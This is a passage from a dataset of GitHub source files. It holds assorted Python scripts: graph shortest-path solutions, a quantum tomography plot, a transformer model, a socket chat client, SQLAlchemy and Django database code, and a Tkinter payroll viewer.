input().split())\r\ngraph = defaultdict(list)\r\nINF = float(\"inf\")\r\n\r\nfor _ in range(m):\r\n a, b, c = map(int, input().split())\r\n graph[a].append((c, b)) # (cost, destination)\r\n\r\n\r\ndef dijkstra(start):\r\n queue = []\r\n heapq.heappush(queue, (0, start)) # (cost, destination)\r\n distance[start] = 0\r\n\r\n while queue:\r\n dist, cur = heapq.heappop(queue)\r\n\r\n if dist > distance[cur]:\r\n continue # 현재 기록된 distance보다 크면 pass\r\n\r\n for w, nxt in graph[cur]:\r\n cost = dist + w\r\n if cost < distance[nxt]:\r\n distance[nxt] = cost\r\n heapq.heappush(queue, (cost, nxt))\r\n\r\n return \r\n\r\nret = [0] * (n + 1)\r\nfor i in range(1, n + 1):\r\n visited = [0] * (n + 1) # 매번 다익스트라 실행 때마다 visited, distance 초기화\r\n distance = [INF] * (n + 1)\r\n dijkstra(i) # i에서 다른 모든 점까지의 최단거리 구하기\r\n ret[i] += distance[x] # 우리가 원하는 것은 x노드 까지의 거리 (파티로 모일 장소)\r\n\r\nvisited = [0] * (n + 1)\r\ndistance = [INF] * (n + 1)\r\ndijkstra(x) # 파티가 끝나고 집으로 돌아가는 최단거리 구하기\r\nfor i in range(1, n + 1):\r\n ret[i] += distance[i] # 파티하러 오는데 걸릴 비용에 집으로 돌아가는 비용 더하기\r\n\r\nprint(max(ret))\r\n\r\n","repo_name":"gnlenfn/DailyProblemSolving","sub_path":"백준/Gold/1238. 파티/파티.py","file_name":"파티.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74735599925","text":"from __future__ import division\nimport matplotlib\n\nfrom matplotlib import pyplot\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport labrad\n'''\nthis analyzes the tomography experiment on April 02, 2013 where we compare (a) tomography at the dephasing time with no dephasing\nand (b) tomography at the dephasing time after the dephasing. The results are the same, showing no coherence\n(as it must be due to frequency switching) and therefore we are dephasing in the right basis.\n'''\ntrials = 100\ndate = '2013Apr02'\n#before dephasing\n#folders = ['2258_22','2258_28','2258_34','2258_41','2258_47','2258_53','2258_59','2259_06','2259_12','2259_18']\n#after dephasing\nfolders = ['2259_58','2300_04','2300_10','2300_16','2300_23','2300_29','2300_35','2301_25','2301_31','2301_37']\nresults = np.zeros((len(folders), 3))\ncxn = labrad.connect()\ndv = cxn.data_vault\nfor i,folder in enumerate(folders):\n dv.cd(['', 'Experiments','RamseyDephaseTomography', date, folder])\n dv.open(1)\n measurement = dv.get().asarray\n results[i] = measurement.transpose()[1]\np1,p2,p3 = np.average(results, axis = 0)\n\nz = p1\ny = p2 - 1/2\nx = 1/2 - p3\n\ndensity_matrx = np.array([[z, x + 1j*y],[x - 1j*y, 1 - z]])\n\nabsol=np.abs(density_matrx)\nfig = pyplot.figure()\n\nlabels = [r'$|e\\rangle$',r'$|g\\rangle$']\n#first plot\nax = fig.add_subplot(111, projection = '3d')\n\n\n\nax.set_zticks((0.0,0.5,1.0))\nax.set_zticklabels([0,0.5,1], fontsize = 22)\n#ax.tick_params(axis='z', labelsize=22)\n#cl = pyplot.getp(cax, 'ymajorticklabels') \n#pyplot.setp(cl, fontsize=22)\n#next subplot\n#ax = fig.add_subplot(122, projection = '3d')\n#ax.set_title('Imaginary', fontsize = 30)\n#q.matrix_histogram(imag, limits = zlim, fig = fig, ax = ax, colorbar = False)\n#ax.set_xticklabels(labels, fontsize = 22)\n#ax.set_yticklabels(labels, fontsize = 22)\n#ax.tick_params(axis='z', labelsize=22)\n#cax, kw = matplotlib.colorbar.make_axes(ax, shrink=.75, pad=.0)\n#cb1 = matplotlib.colorbar.ColorbarBase(cax, norm = norm)\n#cl = pyplot.getp(cax, 'ymajorticklabels') \n#pyplot.setp(cl, fontsize=22)\n\n\n#ax = fig.add_subplot(133)\n#ax.get_xaxis().set_visible(False)\n#ax.get_yaxis().set_visible(False)\n\n#def errorBarSimple(trials, prob):\n# #look at wiki http://en.wikipedia.org/wiki/Checking_whether_a_coin_is_fair\n# '''returns 1 sigma error bar on each side i.e 1 sigma interval is val - err < val + err'''\n# Z = 1.0\n# s = np.sqrt(prob * (1.0 - prob) / float(trials))\n# err = Z * s\n# return err\n#\n#err = errorBarSimple\n#\n#\n#error_matrix = np.array(\n# [\n# [err(trials, p1), err(trials,p3) + 1.j * err(trials, p2)],\n# [err(trials,p3) - 1.j * err(trials,p2), err(trials,p1)]\n# ]\n# )\n#error_matrix = np.round(error_matrix, 2)\n\n#ax.annotate(\"Measurement\", xy=(0.2, 0.8), fontsize = 20, xycoords=\"axes fraction\")\n#ax.annotate(density_matrx, xy=(0.2, 0.7), fontsize = 20, xycoords=\"axes fraction\")\n#ax.annotate(\" 'Error Bar' \", xy=(0.2, 0.6), fontsize = 20, xycoords=\"axes fraction\")\n#ax.annotate(error_matrix, xy=(0.2, 0.5), fontsize = 20, xycoords=\"axes fraction\")\n\nxpos, ypos = np.meshgrid(np.arange(2), np.arange(2))\nxpos = 0.5 * xpos.flatten()\nypos = 0.5 * ypos.flatten()\nzpos = np.zeros(4)\ndx = 0.4 * np.ones_like(zpos)\ndy = dx.copy()\ndz = absol.flatten()\n\nax.bar3d(xpos, ypos, zpos, dx, dy, dz, color='#FFCC00', zsort='average')\nax.set_xticklabels(labels, fontsize = 30)\nax.set_yticklabels(labels, fontsize = 30)\nax.xaxis.set_ticks([0.25,0.75])\nax.yaxis.set_ticks([0.25,0.75])\nax.disable_mouse_rotation()\n#ax.grid(True, linestyle = '--', fillstyle = None)\n#ax.set_xlim([0,2])\n#ax.set_ylim([0,2])\nax.set_zlim([0,1])\nax.view_init(35, 315)\npyplot.savefig('denisty_matrix.pdf')\npyplot.show()\n","repo_name":"HaeffnerLab/cct","sub_path":"old_scripts/dataAnalysis/General_plots_for_presentation_etc/Local_detection_experiment/tomography_plot_publication.py","file_name":"tomography_plot_publication.py","file_ext":"py","file_size_in_byte":3772,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"76"} +{"seq_id":"20358311936","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom transformer import TransformerEncoder, TransformerDecoder\nfrom torch import Tensor\nfrom positional_embedding import *\n\n\nclass Transformer_Encoder_cls(nn.Module):\n def __init__(self, num_layers=8, norm=None, d_model=512, \n nhead=8, dim_feedforward=2048, dropout=0.1,\n drop_path=0.4, activation=\"relu\", \n normalize_before=True, num_cls=18) -> None:\n super().__init__()\n self.encoder = TransformerEncoder(num_layers, norm, d_model, \n nhead, dim_feedforward, dropout, \n drop_path, activation, \n normalize_before)\n self.classify_head = nn.Sequential(\n nn.Linear(d_model, 2 * d_model),\n nn.ReLU(inplace=True),\n nn.Linear(2 * d_model, num_cls)\n )\n \n self.pos_embed = PositionEmbeddingSine(d_model)\n \n def forward(self, src: Tensor, src_mask: Tensor = None) -> Tensor:\n # src: (B, N, C)\n # src_mask: (B, N)\n pos = self.pos_embed(src)\n src = self.encoder(src, src_mask, pos=pos)\n src = self.classify_head(src)\n return src\n\n\ndef build_Transformer_Encoder(num_layers=8, norm=None, d_model=3, \n nhead=8, dim_feedforward=2048, dropout=0.1,\n drop_path=0.4, activation=\"relu\", \n normalize_before=True, num_cls=18):\n \n return Transformer_Encoder_cls(num_layers, norm, d_model, nhead, \n dim_feedforward, dropout, drop_path, activation, \n normalize_before, num_cls)\n ","repo_name":"Chaoyi-He1/HSI","sub_path":"Pixel_MLP/src/transformer_model.py","file_name":"transformer_model.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"73388939125","text":"\"\"\"\nGiven a non-empty array of integers, every element appears twice except for one. Find that single one.\n\nExample:\nInput: [2,2,1]\nOutput: 1\n\"\"\"\n\ndef singleNumber(nums):\n result = 0\n for num in nums:\n result ^= num\n return result\n\nnums = [1,2,2]\n\nprint(singleNumber(nums))","repo_name":"Dipankar-Medhi/DSA-with-Python","sub_path":"Bitwise/single_number.py","file_name":"single_number.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16883001553","text":"import os\nimport ants\nimport antspynet\n\nfrom .. import shared\nfrom . import RAVERuntimeException\n\ndef pipeline_target_brain_mask(image_resampled, transforms, debug):\n try:\n brain_mask = ants.apply_transforms(\n fixed = image_resampled,\n moving = transforms['brain_mask'],\n transformlist=transforms['template_transforms']['invtransforms'],\n whichtoinvert = [True], interpolator=\"linear\", verbose = True)\n if debug:\n brain_mask.plot(black_bg=False, nslices=12, ncol=4)\n return brain_mask\n except Exception as e:\n return RAVERuntimeException(e)\n\n\n","repo_name":"rave-ieeg/rave-pipelines","sub_path":"modules/ants_preprocessing/py/ants_preprocessing/rave_pipeline_adapters/pipeline_target_brain_mask.py","file_name":"pipeline_target_brain_mask.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3204445635","text":"from collections import deque\r\n\r\nn = 6\r\n\r\nedge = [[3, 6], [4, 3], [3, 2], [1, 3], [1, 2], [2, 4], [5, 2]]\r\n\r\ndef solution(n, edge):\r\n ary = [[] for _ in range(n + 1)]\r\n visit = [0 for _ in range(n + 1)]\r\n que = deque([])\r\n \r\n for link in edge :\r\n ary[link[0]].append(link[1])\r\n ary[link[1]].append(link[0])\r\n\r\n visit[1] = 1\r\n for node in ary[1] :\r\n que.appendleft([node, 0])\r\n visit[node] = 1\r\n\r\n max_depth = 0\r\n cnt = 1\r\n\r\n while True :\r\n flag = 0\r\n nbr, depth = que.pop()\r\n\r\n for node in ary[nbr] :\r\n if visit[node] != 1 :\r\n que.appendleft([node, depth + 1])\r\n visit[node] = 1\r\n flag = 1\r\n\r\n if flag == 0 :\r\n if max_depth == depth :\r\n cnt += 1\r\n elif max_depth < depth :\r\n max_depth = depth\r\n cnt = 1\r\n\r\n if not que :\r\n break\r\n \r\n return cnt\r\n\r\nprint(solution(n, edge))","repo_name":"chosaihim/jungle_codingTest_study","sub_path":"JAN/25th/영후_가장먼노드.py","file_name":"영후_가장먼노드.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"631509049","text":"# coding:utf-8\r\n# UNIVERSIDADE FEDERAL DO RIO GRANDE DO NORTE\r\n# DEPARTAMENTO DE ENGENHARIA DE COMPUTACAO E AUTOMACAO\r\n# DISCIPLINA REDES DE COMPUTADORES (DCA0113)\r\n# AUTOR: PROF. CARLOS M D VIEGAS (viegas 'at' dca.ufrn.br)\r\n#\r\n# SCRIPT: Cliente de sockets TCP modificado para enviar texto minusculo ao servidor e aguardar resposta em maiuscula\r\n#\r\n\r\n# importacao das bibliotecas\r\nfrom socket import *\r\nfrom threading import Thread\r\nfrom queue import Queue\r\n\r\n\r\nclass Servidor(Thread):\r\n def __init__(self, socket, nome_fila, priv):\r\n Thread.__init__(self)\r\n self.socket = socket\r\n self.nome_fila = nome_fila\r\n self.priv = priv\r\n\r\n def run(self):\r\n # ------------------- ESCUTA SERVER -----------------------\r\n while True:\r\n try:\r\n # Recebe 1º byte do cliente - tamanho mensagem\r\n tamanho_msg = int.from_bytes(clientSocket.recv(1), byteorder=\"big\")\r\n\r\n if tamanho_msg > 0:\r\n # Obtem endereços IP destino e do remetente\r\n enderecos = self.socket.recv(8)\r\n origem = list(map(int, enderecos[0:4]))\r\n destino = list(map(int, enderecos[4:8]))\r\n\r\n # Obtem nick de destino\r\n nick = self.socket.recv(6).decode(\"utf-8\").replace(\"0\", \"\")\r\n\r\n # Obtem codigo do comando\r\n comando = int.from_bytes(self.socket.recv(1), byteorder=\"big\")\r\n\r\n # Obem mensagem enviada (tamanho_msg - tamanho cabaçalho [24] bytes)\r\n tamanho_msg -= 16\r\n if tamanho_msg <= 40:\r\n mensagem = self.socket.recv(tamanho_msg).decode(\"utf-8\")\r\n\r\n # SAIR\r\n if comando == 0: # sair()\r\n f = bytes([16, 192, 168, 0, 1, 10, 0, 0, 1]) # Insere n�meros no vetor de bytes\r\n f += \":\".encode(\"utf-8\") * (6 - len(\"all\")) + \"all\".encode(\r\n \"utf-8\") # insere o nick no vetor de bytes, preenchendo com 0 a esqueda para que preencha os 8 octetos\r\n\r\n f += bytes([11])\r\n # print(f)\r\n self.socket.send(f)\r\n\r\n self.socket.close()\r\n print(\"Servidor desconectado. Pressione enter para sair\")\r\n break\r\n\r\n # APENAS IMPRIMIR DADOS RECEBIDOS\r\n # 2 - falar\r\n # 3 - listar\r\n # 6 - Requerir novo nick\r\n # 8 - confirmar privado\r\n elif comando == 2:\r\n print(mensagem)\r\n\r\n elif comando == 9:\r\n print(mensagem + \" recusou o pedido\")\r\n self.nome_fila.put(\"\")\r\n elif comando == 5:\r\n print(\"Você saiu do privado\")\r\n self.nome_fila.put(\"\")\r\n priv.put(False)\r\n elif comando == 4:\r\n print(\"Deseja falar privado com \" + mensagem + \" ?\")\r\n self.nome_fila.put(mensagem)\r\n elif comando == 8:\r\n priv.put(True)\r\n print(mensagem)\r\n\r\n else:\r\n mensagem = self.socket.recv(40).decode(\"utf-8\")\r\n print(mensagem, end=\"\")\r\n\r\n # 2 - falar,\r\n # 3 - listar,\r\n # 4 - requisitar privado,\r\n # 1 - entrando,\r\n # 5 - sair privado,\r\n # 6 - mudar nick\r\n # 8 - confirma privado,\r\n # 7 - Eliminar cliente\r\n # 9 - recusar privado\r\n\r\n\r\n # Exceção para se server sair do nada\r\n except ConnectionResetError:\r\n break\r\n # Exceção para se server sair do nada\r\n except (ConnectionAbortedError, OSError):\r\n print(\"Fim do chat\") \r\n break\r\n\r\ntry:\r\n # ---------------------- definicao das variaveis ------------------------\r\n # Sempre digite em IP\r\n serverName = \"localhost\"#'177.89.236.221'\r\n if serverName != \"localhost\":\r\n host = list(map(int, serverName.split(\".\")))\r\n else:\r\n host = [127, 0, 0, 1]\r\n\r\n serverPort = 14000\r\n clientSocket = socket(AF_INET, SOCK_STREAM) # criacao do socket TCP\r\n clientSocket.connect((serverName, serverPort)) # conecta o socket ao servidor\r\n cliente = gethostbyname(gethostname())\r\n\r\n nome = Queue()\r\n priv = Queue()\r\n\r\n #--------------Entrando no servidor ----------------------------------\r\n # Insere números no vetor de bytes\r\n f = bytes([16] + host + list(map(int, cliente.split(\".\"))))\r\n # insere o nick no vetor de bytes, preenchendo com 0 a esquerda para que preencha os 6 bytes\r\n f += \":\".encode(\"utf-8\") * (6 - len(\"all\")) + \"all\".encode(\"utf-8\")\r\n # insere comando\r\n f += bytes([1])\r\n clientSocket.send(f)\r\n #--------------Entrando no servidor ----------------------------------\r\n\r\n server = Servidor(clientSocket, nome, priv)\r\n server.start()\r\n\r\n print(\"Chat iniciado\")\r\n\r\n pediu_privado = \"\"\r\n privado = False\r\n\r\n #------------- ENVIA PARA SERVER -------------------------------------\r\n while True:\r\n\r\n\r\n sentence = input(\"> \")\r\n\r\n if not priv.empty():\r\n privado = priv.get()\r\n\r\n\r\n if server.is_alive():\r\n if sentence == \"sair()\":\r\n comando = 0\r\n # Insere n�meros no vetor de bytes\r\n f = bytes([16, 192, 168, 0, 1, 10, 0, 0, 1])\r\n # insere o nick no vetor de bytes, preenchendo com 0 a esqueda para que preencha os 6 bytes (octetos)\r\n f += \":\".encode(\"utf-8\") * (6 - len(\"all\")) + \"all\".encode(\r\n \"utf-8\")\r\n f += bytes([0])\r\n clientSocket.send(f)\r\n\r\n clientSocket.shutdown(SHUT_RDWR)\r\n clientSocket.close()\r\n break\r\n\r\n elif sentence.startswith(\"nome(\") and sentence.endswith(\")\"):\r\n #Remove \"nome(\" e o último caractere \")\"\r\n sentence = sentence[5:]\r\n sentence = sentence[0:-1] #para retira o \")\"\r\n\r\n if len(sentence) <= 6 and len(sentence) > 0 and sentence != \"nome()\" and \":\" not in sentence:\r\n comando = 6\r\n else:\r\n print(\"Nome inválido\")\r\n continue\r\n\r\n elif sentence == \"listar()\":\r\n comando = 3\r\n\r\n elif sentence.startswith(\"privado(\") and sentence.endswith(\")\"):\r\n comando = 4\r\n sentence = sentence[8:]\r\n sentence = sentence[0:-1] # para retira o \")\"\r\n pediu_privado = sentence\r\n\r\n elif sentence == \"confirmar\":\r\n comando = 8\r\n sentence = nome.get()\r\n pediu_privado = sentence\r\n privado = True\r\n\r\n elif sentence == \"negar\" and len(pediu_privado) > 0:\r\n comando = 9\r\n sentence = pediu_privado\r\n pediu_privado = \"\"\r\n privado = False\r\n\r\n elif sentence == \"sair_privado()\" and len(pediu_privado) > 0:\r\n comando = 5\r\n sentence = pediu_privado\r\n pediu_privado = \"\"\r\n privado = False\r\n\r\n else:\r\n comando = 2\r\n\r\n\r\n sentence = sentence.encode(\"utf-8\")\r\n f = bytes([len(sentence) + 16, 192, 168, 0, 1, 10, 0, 0, 1]) # Insere n�meros no vetor de bytes\r\n\r\n if not privado:\r\n f += \":\".encode(\"utf-8\") * (6 - len(\"all\")) + \"all\".encode(\r\n \"utf-8\") # insere o nick no vetor de bytes, preenchendo com 0 a esqueda para que preencha os 8 octetos\r\n else:\r\n f += \":\".encode(\"utf-8\") * (6 - len(pediu_privado)) + pediu_privado.encode(\r\n \"utf-8\")\r\n\r\n f += bytes([comando]) + sentence\r\n\r\n # print(f)\r\n clientSocket.send(f)\r\n else:\r\n break\r\n\r\n # encerramento o socket do cliente\r\nexcept ConnectionRefusedError:\r\n print(\"Servidor está desconectado\")\r\n\r\n","repo_name":"lucaslyon96/projeto-redes","sub_path":"cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":8612,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35048765227","text":"from contextlib import contextmanager\n\nfrom sqlalchemy import (\n NUMERIC,\n VARCHAR,\n DateTime,\n create_engine,\n delete,\n insert,\n select,\n update,\n)\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom sqlalchemy.orm.session import Session\n\nengine = create_engine(\n \"postgresql://postgres:postgres@dhost:5432/postgres\",\n convert_unicode=False,\n pool_size=5,\n pool_recycle=500,\n max_overflow=5,\n echo=True,\n)\nget_session = scoped_session(\n sessionmaker(autocommit=False, autoflush=False, bind=engine)\n)\nBase = declarative_base()\nBase.query = get_session.query_property()\nBase.metadata.create_all(engine)\n\nfrom datetime import datetime\n\nfrom sqlalchemy.sql.schema import Column\n\n\n@contextmanager\ndef get_scoped_session():\n session = get_session()\n try:\n yield session\n session.commit()\n except:\n session.rollback()\n raise\n finally:\n session.close()\n\n\nclass Test(Base):\n __tablename__ = \"test\"\n id = Column(NUMERIC, primary_key=True)\n name = Column(VARCHAR, nullable=True)\n created = Column(DateTime, nullable=True, default=datetime.now)\n\n def __str__(self):\n return \"\".join([f\"{key}={val}, \" for key, val in self.__dict__.items()])\n\n\ndef run():\n with get_scoped_session() as session:\n session: Session\n\n max_id = session.execute(\"select COALESCE(max(id), 0) from test\").scalar()\n print(f\"max: {max_id}\")\n\n session.execute(\n insert(Test).values(\n id=max_id + 1, name=f\"test{max_id+1}\", created=datetime.now()\n )\n )\n\n # raise RuntimeError\n\n session.execute(update(Test).where(Test.id == 1).values(created=datetime.now()))\n # session.execute(\"update test set created = now() where id = 1\")\n\n result = session.execute(select(Test).where(Test.id == \"01\"))\n print(result)\n\n result = session.query(Test).filter_by(id=1).first()\n print(result.name)\n\n result = session.query(Test).all()\n for test in result:\n print(test)\n\n # session.execute(delete(Test))\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"dgdsingen/test","sub_path":"python/sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19111725643","text":"'''employee payroll'''\nimport tkinter as tk\nimport tkinter.font as tkfont\nfrom tkinter import ttk\nimport cx_Oracle as oracle\nimport os\n\ndef create_connection():\n global conn,c\n conn = oracle.connect(user=\"payroll\", password=\"password\",dsn=\"localhost/xepdb1\")\n c = conn.cursor()\n\ndef close_connection():\n global conn,c\n c.close()\n conn.close()\n\ndef create_table_GUI(main,text,columns,width,double_click):\n fr_table = tk.Frame(main,width=500,height=50)\n fr_table.pack(side='top',anchor='center')\n global table\n table = ttk.Treeview(fr_table)\n table['columns'] = columns\n for i in columns:\n table.heading(i,text=i,anchor='center') \n table.column(\"#0\",width=0,stretch='no')\n for i in range(0,len(columns)):\n table.column(columns[i],anchor='center',width=width[i])\n style = ttk.Style()\n style.configure(\"Treeview\",rowheight=35, font=('Times New Roman', 18))\n style.configure(\"Treeview.Heading\",font=('Times New Roman', 18,'bold'))\n table.tag_configure('odd', background='#DFDFDF')\n if(double_click):\n table.bind(\"\",emp_payroll)\n else:\n pass\n table.pack(side='top',anchor=tk.CENTER)\n return table\n\ndef employee_payroll(selected_row_values,month,year):\n emp_payroll_window = tk.Tk()\n emp_payroll_window.title(\"Employee Payroll | Employee Payroll Management System\")\n heading = tkfont.Font(family=\"Times New Roman\", size=20,weight='bold')\n text = tkfont.Font(family=\"Times New Roman\", size=16)\n text2= tkfont.Font(family=\"Times New Roman\", size=16,weight='bold')\n tk.Label(emp_payroll_window,text = \"EMPLOYEE'S PAYROLL\",font=heading).pack(side='top',anchor='n')\n fr_emp_details = tk.Frame(emp_payroll_window,width=750,height=150)\n fr_emp_details.pack(side='top',anchor='n')\n create_connection()\n data = '''SELECT\n e.emp_id,\n d.dept_name,\n p.pos_name\n FROM\n employee e\n LEFT JOIN\n department d\n ON\n e.dept_id = d.dept_id\n LEFT JOIN\n positions p\n ON\n e.dept_id = p.pos_id\n WHERE\n e.emp_id = :1'''\n data = c.execute(data, selected_row_values[0])\n data = data.fetchall()\n tk.Label(fr_emp_details,text = \"ID:\",font=text).place(x=0, y=10, relx=0.01, rely=0.01)\n tk.Label(fr_emp_details,text = selected_row_values[0],font=text).place(x=20, y=10, relx=0.01, rely=0.01)\n tk.Label(fr_emp_details,text = \"Name:\",font=text).place(x=0, y=50, relx=0.01, rely=0.01)\n tk.Label(fr_emp_details,text = selected_row_values[1],font=text).place(x=45, y=50, relx=0.01, rely=0.01)\n tk.Label(fr_emp_details,text = \"Department:\",font=text).place(x=410, y=10, relx=0.01, rely=0.01)\n tk.Label(fr_emp_details,text = data[0][1],font=text).place(x=490, y=10, relx=0.01, rely=0.01)\n tk.Label(fr_emp_details,text = \"Position:\",font=text).place(x=410, y=50, relx=0.01, rely=0.01)\n tk.Label(fr_emp_details,text = data[0][2],font=text).place(x=470, y=50, relx=0.01, rely=0.01)\n tk.Label(fr_emp_details,text = \"Month:\",font=text).place(x=0, y=90, relx=0.01, rely=0.01)\n tk.Label(fr_emp_details,text = month ,font=text).place(x=45, y=90, relx=0.01, rely=0.01)\n tk.Label(fr_emp_details,text = \"Year:\",font=text).place(x=410, y=90, relx=0.01, rely=0.01)\n tk.Label(fr_emp_details,text = year ,font=text).place(x=445, y=90, relx=0.01, rely=0.01)\n sql = '''SELECT\n *\n FROM\n emp_allowances\n WHERE\n emp_id = :a\n AND\n month_ = :b\n AND\n year_ = :c'''\n result = c.execute(sql, a=selected_row_values[0],b=month, c=year)\n result = result.fetchall()\n if(result==[]):\n tk.Label(emp_payroll_window,text='TOTAL ALLOWANCES: Rs. 0',font=text).pack(side='top',anchor='n')\n else:\n columns = ('Allowance Name','Amount')\n width = [300,190]\n allowances_table = create_table_GUI(emp_payroll_window,text,columns,width,False)\n for i in range(len(result)):\n if(i%2!=0):\n allowances_table.insert(parent='', index='end', iid=i, text=\"Label\", values=(result[i][4],result[i][5]),tag = 'odd')\n else:\n allowances_table.insert(parent='', index='end', iid=i, text=\"Label\", values=(result[i][4],result[i][5]))\n sql = '''SELECT\n SUM(amount) as total\n FROM\n emp_allowances\n WHERE\n emp_id = :a\n AND\n month_ = :b\n AND\n year_ = :c'''\n result = c.execute(sql, a=selected_row_values[0],b=month, c=year)\n result = result.fetchall()\n total_allowances = result[0][0]\n fr_total = tk.Frame(emp_payroll_window,width=500,height=30)\n fr_total.pack(side='top',anchor='n')\n tk.Label(fr_total,text='TOTAL ALLOWANCES: Rs. ',font=text2).place(x=160,y=10)\n tk.Label(fr_total,text= total_allowances,font=text2).place(x=325,y=10) \n sql = '''SELECT\n *\n FROM\n emp_deductions\n WHERE\n emp_id = :a\n AND\n month_ = :b\n AND\n year_ = :c '''\n result = c.execute(sql, a=selected_row_values[0], b=month, c=year)\n result = result.fetchall()\n if(result==[]):\n tk.Label(emp_payroll_window,text='TOTAL DEDUCTIONS: Rs. 0',font=text).pack(side='top',anchor='n')\n else:\n columns = ('Deduction Name','Amount')\n width = [300,190]\n deduction_table = create_table_GUI(emp_payroll_window,text,columns,width,False)\n for i in range(len(result)):\n if(i%2!=0):\n deduction_table.insert(parent='', index='end', iid=i, text=\"Label\", values=(result[i][4],result[i][5]),tag = 'odd')\n else:\n deduction_table.insert(parent='', index='end', iid=i, text=\"Label\", values=(result[i][4],result[i][5]))\n sql = '''SELECT\n SUM(amount) as total\n FROM\n emp_deductions\n WHERE\n emp_id = :a\n AND\n month_ = :b\n AND\n year_ = :c'''\n result = c.execute(sql, a=selected_row_values[0],b=month, c=year)\n result = result.fetchall()\n total_allowances = result[0][0]\n fr_total = tk.Frame(emp_payroll_window,width=500,height=30)\n fr_total.pack(side='top',anchor='n')\n tk.Label(fr_total,text='TOTAL DEDUCITONS: Rs. ',font=text2).place(x=158,y=10)\n tk.Label(fr_total,text= total_allowances,font=text2).place(x=320,y=10)\n tk.Label(emp_payroll_window,text= 'NET SALARY: Rs. '+selected_row_values[5],font=text2).pack(side='top',anchor='n')\n close_connection()\n emp_payroll_window.mainloop()\n\n","repo_name":"HariChandana27/Employee-Payroll-Management-System","sub_path":"emp_payroll.py","file_name":"emp_payroll.py","file_ext":"py","file_size_in_byte":7298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"72755180402","text":"from django.shortcuts import render\nfrom rest_framework import viewsets\nfrom .models import (\n Item, Scale, Inventory, Question, \n Response as ItemResponse, Norm, Sample, Result, Progress\n)\nfrom .serializers import (\n ScaleSerializer, InventorySerializer, \n ItemSerializer, QuestionSerializer, \n ResponseSerializer, NormSerializer, \n SampleSerializer, ResultSerializer, ResultRequestSerializer\n)\nfrom django.http import Http404\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom .mixins import CreateListMixin\n# from django.db.models import Q\n\n\nclass ScaleView(viewsets.ModelViewSet):\n queryset = Scale.objects.all()\n serializer_class = ScaleSerializer\n\n\nclass InventoryView(viewsets.ModelViewSet):\n serializer_class = InventorySerializer\n\n def get_queryset(self):\n user = self.request.user\n progress = self.request.query_params.get(\"progress\")\n if progress == \"all\":\n inventories = Inventory.objects.all()\n elif progress == \"done\":\n inventories = Inventory.objects.filter(progress__user=user)\n else: \n inventories = Inventory.objects.exclude(progress__user=user)\n return inventories\n\n \n def get_serializer_context(self):\n user = self.request.user\n return {'user': user}\n\n\nclass ItemView(viewsets.ModelViewSet):\n queryset = Item.objects.all()\n serializer_class = ItemSerializer\n\n\nclass QuestionView(viewsets.ModelViewSet):\n queryset = Question.objects.all()\n serializer_class = QuestionSerializer\n\n\nclass ResponseView(CreateListMixin, viewsets.ModelViewSet):\n serializer_class = ResponseSerializer\n\n def get_queryset(self):\n user = self.request.user\n return ItemResponse.objects.filter(user=user)\n\n\nclass NormView(viewsets.ModelViewSet):\n queryset = Norm.objects.all()\n serializer_class = NormSerializer\n\n\nclass SampleView(viewsets.ModelViewSet):\n queryset = Sample.objects.all()\n serializer_class = SampleSerializer\n\n\nclass ResultList(APIView):\n\n def get(self, request, format=None):\n user = self.request.user\n results = Result.objects.filter(user=user)\n serializer = ResultSerializer(results, many=True)\n return Response(serializer.data)\n\n\n def post(self, request, format=None):\n user = self.request.user\n request_serializer = ResultRequestSerializer(data=request.data)\n if request_serializer.is_valid(): # check if result is present \n inventory_id = request_serializer.data.get(\"inventory\")\n present_results = Result.objects.filter(user=user, inventory=inventory_id)\n if present_results.exists(): # if present - return\n result_serializer = ResultSerializer(present_results, many=True)\n return Response(result_serializer.data, status=status.HTTP_200_OK)\n else: # if not present - create and return\n inventory = Inventory.objects.filter(pk=inventory_id).first()\n scales = inventory.scales.all() # get all scales for the test\n new_results = [s.calculate_result(user=user, inventory=inventory_id) for s in scales]\n result_serializer = ResultSerializer(new_results, many=True)\n progress = Progress(\n user=user, \n inventory=Inventory(pk=inventory_id),\n status=\"DONE\", \n )\n progress.save()\n return Response(result_serializer.data, status=status.HTTP_201_CREATED)\n return Response(request_serializer.errors, status=status.HTTP_400_BAD_REQUEST)","repo_name":"DanielTitkov/vkpsytest-backend","sub_path":"inventories/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32663859486","text":"# coding: utf-8\n# @Time : 2019/5/11 20:41\n# @Author : zhongshan\n# @Email : 15926220700@139.com\n\nimport time\n\nfrom TagBase.config import (\n TAG_ATTRS_MAP,\n TABLE_NAME_T_TAG,\n TABLE_NAME_T_TAG_VALUE,\n)\nfrom TagBase.template import (\n t_tag_ins_template,\n t_tag_value_ins_template\n)\nfrom TagProc.template_c12 import (\n DB_CONFIG,\n CUSTOM_ID,\n TAG_FILE_PATH,\n)\nfrom common.db_api import DBApi\n\n\nclass TagInfoPrc(object):\n 